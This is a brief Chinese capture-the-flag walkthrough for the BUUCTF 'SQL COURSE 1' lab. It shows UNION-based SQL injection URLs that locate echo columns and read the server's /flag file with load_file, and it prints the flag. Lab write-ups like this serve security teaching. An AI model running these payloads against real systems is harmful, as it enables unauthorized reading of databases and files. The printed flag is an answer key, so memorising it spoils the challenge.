BUU SQL COURSE 1

靶场教程

1.访问页面。
BUU SQL COURSE 1_第1张图片
2.在网页寻找注入点。发现注入点链接位置。

http://cdc5e125-0fe8-47ae-bc87-8af4d75d991e.node5.buuoj.cn:81/backend/content_detail.php?id=1

BUU SQL COURSE 1_第2张图片
3.访问该连接,存在注入点。并存在1,2两个回显位。

http://cdc5e125-0fe8-47ae-bc87-8af4d75d991e.node5.buuoj.cn:81/backend/content_detail.php?id=-1 union select 1,2%23

BUU SQL COURSE 1_第3张图片
4.直接读取 flag 文件,获取 flag

http://cdc5e125-0fe8-47ae-bc87-8af4d75d991e.node5.buuoj.cn:81/backend/content_detail.php?id=-1 union select load_file("/flag"),2%23

flag{1eae0815-eb0d-4934-a598-319ca6685ea1}

BUU SQL COURSE 1_第4张图片

你可能感兴趣的:(BUUCTF,sql,数据库,安全,web安全,安全性测试,前端)